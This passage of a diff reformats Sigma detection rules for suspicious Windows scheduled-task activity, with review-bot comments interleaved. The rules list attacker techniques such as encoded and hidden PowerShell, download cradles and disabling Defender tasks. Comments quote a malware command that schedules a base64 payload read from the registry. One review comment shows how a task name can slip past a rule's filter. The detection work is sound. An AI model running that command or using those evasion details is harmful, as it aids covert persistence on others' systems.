and runs only once references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /create ' - ' /sc once ' - \Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml index 45709baff..267728c02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml 
@@ -1,13 +1,12 @@ title: Delete Important Scheduled Task id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 related: - - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by deleting their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,10 +24,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational schtasks_exe: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /delete - /tn - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml index c1078dcd5..d4fc6f279 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml 
@@ -1,9 +1,7 @@ title: Delete All Scheduled Tasks id: 220457c1-1c9f-4c2e-afe6-9598926222c1 status: test -description: Detects the usage of schtasks with the delete flag and the asterisk symbol - to delete all tasks from the schedule of the local computer, including tasks scheduled - by other users. +description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /delete ' - /tn \* - ' /f' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml index a418aa890..e738fd5a0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml 
@@ -1,11 +1,10 @@ title: Disable Important Scheduled Task id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 related: - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by disabling their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task - https://twitter.com/MichalKoczwara/status/1553634816016498688 @@ -26,11 +25,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational schtasks_exe: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Change - /TN - /disable - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml index e30a31368..6aef98ba0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml 
@@ -1,11 +1,10 @@ title: Suspicious Schtasks From Env Var Folder id: 81325ce1-be01-4250-944f-b4789644556f related: - - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 - type: derived + - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline + type: derived status: experimental -description: Detects Schtask creations that point to a suspicious folder or an environment - variable often used by malware +description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware references: - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 @@ -25,9 +24,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1_create: Image|endswith: \schtasks.exe - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection1_all_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \AppData\Local\ 
@@ -38,43 +37,42 @@ detection: selection2_parent: ParentCommandLine|endswith: \svchost.exe -k netsvcs -p -s Schedule selection2_some_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \Users\Public - '%Public%' filter_mixed: - - CommandLine|contains: - - update_task.xml - - /Create /TN TVInstallRestore /TR - - ParentCommandLine|contains: unattended.ini + - CommandLine|contains: + - update_task.xml + - /Create /TN TVInstallRestore /TR + - ParentCommandLine|contains: unattended.ini filter_avira_install: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /Xml "C:\Users\ - \AppData\Local\Temp\.CR. - Avira_Security_Installation.xml filter_avira_other: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /F /TN - '/Xml ' - \AppData\Local\Temp\is- - Avira_ - CommandLine|contains: + CommandLine|contains: - .tmp\UpdateFallbackTask.xml - .tmp\WatchdogServiceControlManagerTimeout.xml - .tmp\SystrayAutostart.xml - .tmp\MaintenanceTask.xml filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Temp\ - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml - condition: process_creation and (( all of selection1* or all of selection2* ) - and not 1 of filter*) + condition: process_creation and (( all of selection1* or all of selection2* ) and not 1 of filter*) falsepositives: - - Benign scheduled tasks creations or executions that happen often during software - installations - - Software that uses the AppData folder and scheduled tasks to update the software - in the AppData folders + - Benign scheduled tasks creations or executions that happen often during software installations + - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders level: medium ruletype: Sigma 
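Review bot: Both new comments `# Comment out this filter if you dont use AVIRA` on filter_avira_install and filter_avira_other should read "don't". Since the two filters match on `\AppData\Local\Temp\` paths and a vendor-specific XML file name, the comment could also make the risk explicit for deployments without that product: `# Comment out this filter if you don't use AVIRA, as it exempts task creation from %LOCALAPPDATA%\Temp`, which is exactly the location the rule otherwise flags.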
diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml index 9d1e3f3d7..e24d7b9a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml @@ -1,8 +1,7 @@ title: Schtasks From Suspicious Folders id: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb status: test -description: Detects scheduled task creations that have suspicious action command - and folder combinations +description: Detects scheduled task creations that have suspicious action command and folder combinations references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical author: Florian Roth (Nextron Systems) @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_create: - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection_command: - CommandLine|contains: + CommandLine|contains: - powershell - pwsh - 'cmd /c ' @@ -35,7 +34,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_all_folders: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - '%ProgramData%' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml index 0ed2ca07e..eb525b1fb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml 
@@ -20,16 +20,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_img: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' selection_tn: - CommandLine|contains: + CommandLine|contains: + # Can start with single or double quote - /TN "{ - /TN '{ - /TN { selection_end: - CommandLine|contains: + CommandLine|contains: + # Ending of the name to avoid possible FP in the rest of the commandline - '}"' - - '}''' + - "}'" - '} ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml index 32a20bfcc..d3ad51822 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml @@ -1,8 +1,7 @@ title: Uncommon One Time Only Scheduled Task At 00:00 id: 970823b7-273b-460a-8afc-3a6811998529 status: test -description: Detects scheduled task creation events that include suspicious actions, - and is run once at 00:00 +description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|contains: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - wscript - vbscript - cscript 
@@ -35,7 +34,7 @@ detection: - powershell - \AppData\ selection_time: - CommandLine|contains|all: + CommandLine|contains|all: - once - 00:00 condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml index 8548595dc..43f9946c8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml @@ -1,8 +1,7 @@ title: Suspicious Add Scheduled Task Parent id: 9494479d-d994-40bf-a8b1-eea890237021 status: test -description: Detects suspicious scheduled task creations from a parent stored in a - temporary folder +description: Detects suspicious scheduled task creations from a parent stored in a temporary folder references: - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ author: Florian Roth (Nextron Systems) @@ -21,19 +20,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' ParentImage|contains: - \AppData\Local\ - \AppData\Roaming\ - \Temporary Internet - \Users\Public\ filter: - CommandLine|contains: + CommandLine|contains: - update_task.xml - unattended.ini condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks + - Software installers that run from temporary folders and also install scheduled tasks level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml index 04029b645..91e0d764b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml @@ -1,16 +1,12 @@ title: Potential Persistence Via Microsoft Compatibility Appraiser id: f548a603-c9f2-4c89-b511-b089f7e94549 related: - - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 - type: derived + - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 + type: derived status: test -description: 'Detects manual execution of the "Microsoft Compatibility Appraiser" - task via schtasks. - - In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" - registry key. - - ' +description: | + Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. + In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman @@ -28,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'run ' - \Application Experience\Microsoft Compatibility Appraiser condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml index 75404cfca..cfbadb7f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml 
@@ -1,13 +1,10 @@ title: Potential Persistence Via Powershell Search Order Hijacking - Task id: b66474aa-bd92-4333-a16c-298155b120df related: - - id: 6e8811ee-90ba-441e-8486-5653e68b2299 - type: similar + - id: 6e8811ee-90ba-441e-8486-5653e68b2299 + type: similar status: test -description: Detects suspicious powershell execution via a schedule task where the - command ends with an suspicious flags to hide the powershell instance instead - of executeing scripts or commands. This could be a sign of persistence via PowerShell - "Get-Variable" technique as seen being used in Colibri Loader +description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader references: - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) @@ -31,7 +28,7 @@ detection: ParentCommandLine|contains|all: - -k netsvcs - -s Schedule - CommandLine|endswith: + CommandLine|endswith: - ' -windowstyle hidden' - ' -w hidden' - ' -ep bypass' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml index 97784abcd..10b252540 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml 
@@ -1,11 +1,10 @@ title: Scheduled Task Executing Payload from Registry id: 86588b36-c6d3-465f-9cee-8f9093e07798 related: - - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 - type: derived + - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 + type: derived status: experimental -description: Detects the creation of a schtasks that potentially executes a payload - stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -24,22 +23,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' - HKEY_ filter_main_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml index 5e8610117..f8bd1055f 100644 
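Review bot: The example command line added as a comment under `selection_img` contains `FromBase64String`, which `filter_main_encoding` at the bottom of the same hunk explicitly excludes, so it is an example that this rule will never fire on (it is the case covered by the encoded variant c4eeeeae listed under `related`). A matching example would be the unencoded form, e.g. `# schtasks.exe /Create /TN "x" /TR "powershell -Command IEX((Get-ItemProperty -Path HKCU:\SOFTWARE\X).Y)" /SC MINUTE`. Separately, the `' gp '` alias entry needs a leading space, so `(gp HKCU:...` or `(gp -Path` in the exact position the example uses is not matched; adding `'(gp '` next to it would cover that. The `detection:` block starts before this hunk.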
--- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml @@ -1,12 +1,10 @@ title: Scheduled Task Executing Encoded Payload from Registry id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 status: test -description: Detects the creation of a schtask that potentially executes a base64 - encoded payload stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), - Nasreddine Bencherchali (Nextron Systems) +author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022/02/12 modified: 2023/02/04 tags: @@ -23,20 +21,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' 
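Review bot: `selection_cli_get` matches the alias only as `' gp '` with a leading space, yet the example command line added just above it places the cmdlet directly after an opening parenthesis (`(Get-ItemProperty -Path`); the alias form of that same payload, `(gp -Path`, is therefore missed. I would add `- '(gp '` beside the existing entry, keeping the `# Alias` comment on both. The `detection:` block starts before this hunk.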
diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml index 5b9f3aed5..ae6dfd712 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Types id: 24c8392b-aa3c-46b7-a545-43f71657fe98 related: - - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a - type: similar + - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a + type: similar status: test -description: Detects scheduled task creations or modification on a suspicious schedule - type +description: Detects scheduled task creations or modification on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -24,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' filter_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml index d3055a601..86e315eea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml 
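Review bot: The new inline comment on `' SYSTEM'` says "it gets it's own value" where "its" is meant; I would write `# SYSTEM is a valid value for schtasks hence it gets its own entry with a leading space`. The comment should also say that this entry (no trailing space) deliberately matches `SYSTEM` at the end of the command line, since the sibling SYSTEM-privileges rule in this same commit uses `' SYSTEM '` with both spaces and a reader will wonder which is intended.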
+++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Type With High Privileges id: 7a02e22e-b885-4404-b38b-1ddc7e65258a related: - - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 - type: similar + - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 + type: similar status: test -description: Detects scheduled task creations or modification to be run with high - privileges on a suspicious schedule type +description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -23,22 +22,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' selection_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_*) falsepositives: - - Some installers were seen using this method of creation unfortunately. Filter - them in your environment + - Some installers were seen using this method of creation unfortunately. Filter them in your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml index 77d7cee5a..0fe050dec 100644 
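Review bot: Same comment typo as in the companion rule: "it gets it's own value" should read "its own". Because this rule's `selection_privs` uses `' SYSTEM'` without a trailing space, it also matches `/RU SYSTEM` as the last token; worth stating that in the comment so nobody "harmonises" it to `' SYSTEM '` later.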
--- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml @@ -1,9 +1,7 @@ title: Suspicious Scheduled Task Creation via Masqueraded XML File id: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c status: experimental -description: Detects the creation of a scheduled task using the "-XML" flag with a - file without the '.xml' extension. This behavior could be indicative of potential - defense evasion attempt during persistence +description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence references: - https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml- - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml @@ -23,18 +21,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: + CommandLine|contains: - /create - -create selection_cli_xml: - CommandLine|contains: + CommandLine|contains: - /xml - -xml filter_main_extension_xml: - CommandLine|contains: .xml + CommandLine|contains: .xml filter_main_system_process: IntegrityLevel: System filter_main_rundll32: 
@@ -44,13 +42,13 @@ detection: - .tmp,zzzzInvokeManagedCustomActionOutOfProc filter_optional_third_party: ParentImage|endswith: + # Consider removing any tools that you don't use to avoid blind spots - :\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe - :\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe - :\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe - :\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe - :\Program Files\Dell\SupportAssist\pcdrcui.exe - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml index dc83543e2..484795f1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml @@ -1,8 +1,7 @@ title: Suspicious Command Patterns In Scheduled Task Creation id: f2c64357-b1d2-41b7-849f-34d2682c0fad status: experimental -description: Detects scheduled task creation using "schtasks" that contain potentially - suspicious or uncommon commands +description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands references: - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ - https://twitter.com/RedDrip7/status/1506480588827467785 
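Review bot: `filter_main_extension_xml` (in the preceding hunk of this file) is `CommandLine|contains: .xml`, which clears the whole command line whenever `.xml` appears anywhere in it; a task created as `schtasks /create /tn update.xml /xml C:\Users\Public\t.txt` is thus not reported even though the `/xml` argument is exactly the masqueraded file the rule describes. Tying the extension to the argument, e.g. `CommandLine|re: '(?i)[/-]xml\s+"?[^"\s]+\.xml'` in place of the plain contains, would keep the intended exclusion without that bypass. The new comment on `filter_optional_third_party` is helpful; I would extend it with `# Each entry is a ParentImage exclusion only – a payload launched by one of these parents is not seen`. The `detection:` block starts before this hunk.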
@@ -23,13 +22,13 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_schtasks: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' selection_pattern_1: - CommandLine|contains: + CommandLine|contains: - '/sc minute ' - '/ru system ' selection_pattern_2: - CommandLine|contains: + CommandLine|contains: - cmd /c - cmd /k - cmd /r @@ -37,7 +36,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_uncommon: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -enc ' - ' -w hidden ' @@ -46,26 +45,24 @@ detection: - .DownloadData - .DownloadFile - .DownloadString - - '/c start /min ' + - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785 - FromBase64String - mshta http - mshta.exe http selection_anomaly_1: - CommandLine|contains: + CommandLine|contains: - :\Windows\Temp\ - \AppData\ - '%AppData%' - '%Temp%' - '%tmp%' selection_anomaly_2: - CommandLine|contains: + CommandLine|contains: - cscript - curl - wscript - condition: process_creation and (selection_schtasks and ( all of selection_pattern_* - or selection_uncommon or all of selection_anomaly_* )) + condition: process_creation and (selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks are expected to generate some false positives + - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml index cf1350dbe..0793e953b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml 
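Review bot: `selection_uncommon` lists `' -enc '` with a trailing space, so `-EncodedCommand`, `-ec` and the other accepted abbreviations are not matched, and `' -w hidden '` likewise misses `-windowstyle hidden`; a task action using either spelling falls through unless another entry happens to hit. Adding `- ' -encodedcommand '`, `- ' -ec '` and `- ' -windowstyle hidden'` next to the existing entries would close that without widening the rule. The new trailing comment linking `'/c start /min '` to the tweet is the right way to record provenance; the other entries in that list would benefit from the same. The `detection:` block starts before these hunks.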
